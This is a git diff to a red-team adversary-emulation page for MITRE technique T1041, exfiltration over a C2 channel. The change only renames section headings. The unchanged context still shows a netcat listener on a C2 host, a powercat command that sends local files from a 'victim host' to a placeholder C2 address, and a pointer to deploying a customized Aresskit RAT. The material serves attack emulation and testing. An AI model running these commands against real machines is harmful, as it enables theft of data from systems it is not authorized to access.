--- a/Techniques/T1041/T1041.md
+++ b/Techniques/T1041/T1041.md
@@ -7,7 +7,7 @@
 
 # Details
 
-## Using PowerCat
+## PowerCat
 * Load PowerCat in command line on victim host:
 ```
 powershell
@@ -22,8 +22,8 @@ nc -lvvp <port-of-C2> > out.file
 powercat -c <ip-of-C2> -p <port-of-C2> -i <path-of-local-files>
 ```
 
-## Using RAT
-### Using customized Aresskit
+## RAT
+### Customized Aresskit
 * [Deploy](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1219/T1219.md) customized `aresskit` to victim host
 * Transfer local files to C2 host:
   * Start a listener on C2 host:
